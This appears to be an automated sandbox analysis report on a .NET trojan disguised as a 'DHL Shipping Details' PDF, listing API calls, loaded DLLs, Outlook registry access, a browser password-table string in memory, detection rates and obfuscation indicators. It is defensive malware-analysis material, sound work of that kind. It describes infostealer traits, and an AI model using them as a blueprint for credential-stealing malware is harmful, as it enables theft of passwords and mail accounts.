                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, c4yKy3CLwkeiWGwXdd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3538427208.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E3E000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E2F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeReversingLabs: Detection: 52%
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeVirustotal: Detection: 62%
                  Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.cs.Net Code: n1XkyJdOW8 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.cs.Net Code: n1XkyJdOW8 System.Reflection.Assembly.Load(byte[])
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: 0xEC09643B [Mon Jun 27 18:40:59 2095 UTC]
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name: AGB[a"h3
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name:
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A18EC00 push esp; ret 0_2_0A18EC11
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A692A2A pushfd ; ret 0_2_0A692A31
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A69C0B1 push E80C568Dh; iretd 0_2_0A69C04D
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A690634 push 26BA5A65h; retf 0_2_0A69063C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A6934A8 pushad ; retf 0_2_0A6934A9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A6934AA push eax; retf 0_2_0A6934B1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A747D60 push eax; ret 0_2_0A748181
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0A74364F push E801025Eh; retf 0_2_0A743661
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_0F02487E push ecx; ret 0_2_0F024880
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0104F273 push ebp; retf 2_2_0104F281
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_01047E59 push edx; iretd 2_2_01047E5A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06551B4A push es; iretd 2_2_06551C10
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_0655001E push es; retf 2_2_0655001C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 2_2_06550006 push es; retf 2_2_0655001C
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name: AGB[a"h3 entropy: 7.998392389545792
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name: .text entropy: 7.913790405188838
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, f47vULmJNrFYpZqgtO.csHigh entropy of concatenated method names: 'mkKXBdYvb3', 'WZZXRhd32J', 'PrvXbF0Gf5', 'TiCXIsLVY0', 'soEXwPPOWK', 'VOwXVAeVH2', 'aNrXUStFKo', 'UsEXm8vO4h', 'AXPXORHpZl', 'xBjXWyhpXh'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, fhnG4S7IGkBcQ6Sp8f.csHigh entropy of concatenated method names: 'l5F9I2T2Qq', 'XfE9wVMFdK', 'RIm9Vcem2o', 'MGd9UopCkK', 'N0o9aYHLt0', 'fPI9mliFhC', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, lTvSmYvDUOrDDU1wf4.csHigh entropy of concatenated method names: 'vgwyWoNrQ', 'pN7TFOnt4', 'xb72GUQk4', 'b7eJiENJ9', 'U3Gonlif2', 'T73PoNsbe', 'UWpP2vyKJKpiUXEewO', 'LfyuDXQEarV6b4LUWs', 'AEl5DY5PF', 'HVe9ILfKD'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, sPT3s0jcDlRTWgX4RK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gq89ArlZMj', 'alX9nBvHL4', 'OQu98AQyV7', 'hic93dxZlY', 'lF79GCMMDn', 'cdt9HhmgWB', 'vEm9xT1jb2'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, CxCEXbxw6rnEe06hqJ.csHigh entropy of concatenated method names: 'u6FMWi83eN', 'JyGMQKsvdM', 'ToString', 'mhoMRSxTRc', 'kSbMblFKQ1', 'H3LMIvrj7J', 'z8OMwDREmG', 'AKhMV4X2VL', 'PL4MUUXscf', 'MumMmJ9fEL'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, uUpsiVY6TAwVDPPVKv.csHigh entropy of concatenated method names: 'rwTVBW6iM6', 'RdPVbIEmOK', 'GrPVwNbMNS', 'eWXVUuySSq', 'UVfVmXMLUF', 'XSMwhxywNZ', 'RKcwZ7PdDW', 'DCswqWUen6', 'uh6wlLICdn', 'yoqwE9pdCy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, elMIJ5jjC5cd7k815MY.csHigh entropy of concatenated method names: 'EOk979Yb2A', 'Wlc9z4Y0tk', 'tSHLc29qjN', 'ASLLjQaDvy', 'gwuLvwU3qG', 'QeXLXeAc9w', 'u4fLkmjyHe', 'kQkLB9Yy2P', 'VrpLRo2pVq', 'CF0LbgKeKs'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, c4yKy3CLwkeiWGwXdd.csHigh entropy of concatenated method names: 'tYwb3WbQVH', 'NMRbGSj1nK', 'IwobHsr46o', 'diQbxYZN3q', 'v4pbhyqGDs', 'J0sbZ8hH8s', 'EASbqitMqu', 'D1SblFfRid', 'UyqbEXkSM1', 'iQhb7WCqVK'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, Ky9CtO3e8NlRrU9j3G.csHigh entropy of concatenated method names: 'zSrS4ypo3S', 'NQOSnuEwIF', 'teAS3pvrj7', 'Gk9SG3ZZoZ', 'La1SNVXUiP', 'rirSrTE8hb', 'C1YSKdp0n3', 'sjPSuXIL5t', 'U6mS1PUuLG', 'l2NSeBJ0vy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, SG6efAkArUXHEYuTWX.csHigh entropy of concatenated method names: 'oYvjU4yKy3', 'twkjmeiWGw', 'e5OjWhQ2cN', 'AxljQyouWD', 'XbAjS6mgUp', 'wiVjt6TAwV', 'UFYeod6K0c70slFaqj', 'RKRdjxdTD59dE3RjXF', 'atoYCPqAkb9wYgo8Ak', 'xGpjj868bQ'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, YYFH038Fg7Ba4dVsZ8.csHigh entropy of concatenated method names: 'xZK6CsO3kl', 'B866oNVtjS', 'GDf6YbXpCU', 'Q2y6NchCKB', 'YUa6KR7Voj', 'vF56uZY3Wb', 'XR76egnJgD', 'ni56fqCrIQ', 'yP664N23S3', 'duL6AJYNIM'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, fcbQ2DbICkakXMZwoF.csHigh entropy of concatenated method names: 'Dispose', 'm7rjEEFNpu', 'mTjvNTmPhA', 'BqJg2ZYn3E', 'Xvsj7BjyOs', 'mjpjzajE0U', 'ProcessDialogKey', 'Hqfvc4Ujf4', 'iKKvjTYNcj', 'JXfvvRhnG4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, Tj361az0V1Ld0cf4gr.csHigh entropy of concatenated method names: 'VEV92ZRDJg', 'jRy9CiZhan', 'm489oib1yt', 'KCG9YZ4otx', 'ikX9NX6Eym', 'PaI9Kxnwok', 'GYP9uakD2w', 'Vqy9sWWlg9', 'be29DwLv7T', 'kkx9pclC5a'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, tXGowko5OhQ2cNTxly.csHigh entropy of concatenated method names: 'So0ITgMSXe', 'FhQI2JtAHI', 'pdTICAojWt', 'N1KIo3raUM', 'yBBISbKuVY', 'BUHItUMlkH', 'POmIMKwVke', 'SK3I5rIhmI', 'REwIaAeDM0', 'IVSI9cKEUi'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, M4Ujf4EwKKTYNcjuXf.csHigh entropy of concatenated method names: 'm5vaYJSEou', 'iupaNXufuq', 'vniar9iIOR', 'pg9aK1IuGS', 'xEOauLnE4F', 'qP2a1VprV5', 'rCdaeacPbl', 'g68afaEMae', 'Rlma088xJw', 'jXIa4bWvXy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, ygJQObIlKrQWvchxKd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ogtvEASb2j', 'B4Kv7MLw5C', 'xFYvzpqRRv', 'm9YXceQD82', 'lNcXjnPDms', 'k02XvCeEPW', 'sXlXXFjTVE', 'OmpC5hF9i2mXr0Q1HZ4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, Ikv8N3HYv9CSW5eDE4.csHigh entropy of concatenated method names: 'ToString', 'xtQtAqQt2y', 'XdptNZT9ch', 'Tiytr4raKZ', 'CYItKxWKO5', 'urotu42rVO', 'O3Kt1TryVT', 'G5Vte6556p', 'bUotf8vo1w', 'DwLt0e4t3x'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, T9AcilZkX1nbqZn73F.csHigh entropy of concatenated method names: 'tZjMlnikRc', 'ThmM77ce0Q', 'Usg5cusg83', 'siP5jhWfXW', 'dUaMAxka2R', 'D9rMn6u9V8', 'CKFM8x4tGq', 'zJMM3GXiqQ', 'cqmMGhW4Wk', 'b82MHSTFb4'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, AYAsSq0sXguNnJDAQA.csHigh entropy of concatenated method names: 'qWUUD3HZCn', 'zLVUpFauKV', 'fjGUyXsU85', 'rVhUT1twfJ', 'LkDUi0Y4PV', 'd6CU27fU2L', 'fgtUJfctyU', 'vIyUCUD89R', 'DLIUo1OPma', 'o4iUPRs12E'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, Q2fOA1qatW7rEFNpul.csHigh entropy of concatenated method names: 'eOiaSWugiR', 'jxVaMNaTgg', 'Ef1aaWHtPa', 'tJ5aLHteCb', 'Op3aF1gLlw', 'uCKasOCjkk', 'Dispose', 'OJF5ReNk9w', 'iTH5b7cxN9', 'sEo5IeuCNd'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, EuWDX0P92e5X6lbA6m.csHigh entropy of concatenated method names: 'WfUwiGtg3w', 'n5SwJ043wG', 'S2OIrMVgYd', 'UGCIKTnVL2', 'XM2IuDCqni', 'zRNI128TCc', 'QonIe0vrum', 'KjUIfJQn1w', 'MrAI0fGKm4', 'yCYI40dEI5'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4877e60.3.raw.unpack, ye4SI0eTwELSnnrSOG.csHigh entropy of concatenated method names: 'quxURvpZTX', 'TokUIwhOJn', 'GDnUVBL5Lp', 'NyiV7J985B', 'YFpVzOQgtD', 'uB2UcxcI9J', 'h2PUjIhHX2', 'YnQUvsdFZm', 'vhEUXC2QT6', 'oIsUk4mwRt'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, f47vULmJNrFYpZqgtO.csHigh entropy of concatenated method names: 'mkKXBdYvb3', 'WZZXRhd32J', 'PrvXbF0Gf5', 'TiCXIsLVY0', 'soEXwPPOWK', 'VOwXVAeVH2', 'aNrXUStFKo', 'UsEXm8vO4h', 'AXPXORHpZl', 'xBjXWyhpXh'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, fhnG4S7IGkBcQ6Sp8f.csHigh entropy of concatenated method names: 'l5F9I2T2Qq', 'XfE9wVMFdK', 'RIm9Vcem2o', 'MGd9UopCkK', 'N0o9aYHLt0', 'fPI9mliFhC', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, lTvSmYvDUOrDDU1wf4.csHigh entropy of concatenated method names: 'vgwyWoNrQ', 'pN7TFOnt4', 'xb72GUQk4', 'b7eJiENJ9', 'U3Gonlif2', 'T73PoNsbe', 'UWpP2vyKJKpiUXEewO', 'LfyuDXQEarV6b4LUWs', 'AEl5DY5PF', 'HVe9ILfKD'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, sPT3s0jcDlRTWgX4RK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gq89ArlZMj', 'alX9nBvHL4', 'OQu98AQyV7', 'hic93dxZlY', 'lF79GCMMDn', 'cdt9HhmgWB', 'vEm9xT1jb2'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, CxCEXbxw6rnEe06hqJ.csHigh entropy of concatenated method names: 'u6FMWi83eN', 'JyGMQKsvdM', 'ToString', 'mhoMRSxTRc', 'kSbMblFKQ1', 'H3LMIvrj7J', 'z8OMwDREmG', 'AKhMV4X2VL', 'PL4MUUXscf', 'MumMmJ9fEL'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, uUpsiVY6TAwVDPPVKv.csHigh entropy of concatenated method names: 'rwTVBW6iM6', 'RdPVbIEmOK', 'GrPVwNbMNS', 'eWXVUuySSq', 'UVfVmXMLUF', 'XSMwhxywNZ', 'RKcwZ7PdDW', 'DCswqWUen6', 'uh6wlLICdn', 'yoqwE9pdCy'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.a8c0000.7.raw.unpack, elMIJ5jjC5cd7k815MY.csHigh entropy of concatenated method names: 'EOk979Yb2A', 'Wlc9z4Y0tk', 'tSHLc29qjN', 'ASLLjQaDvy', 'gwuLvwU3qG', 'QeXLXeAc9w', 'u4fLkmjyHe', 'kQkLB9Yy2P', 'VrpLRo2pVq', 'CF0LbgKeKs'
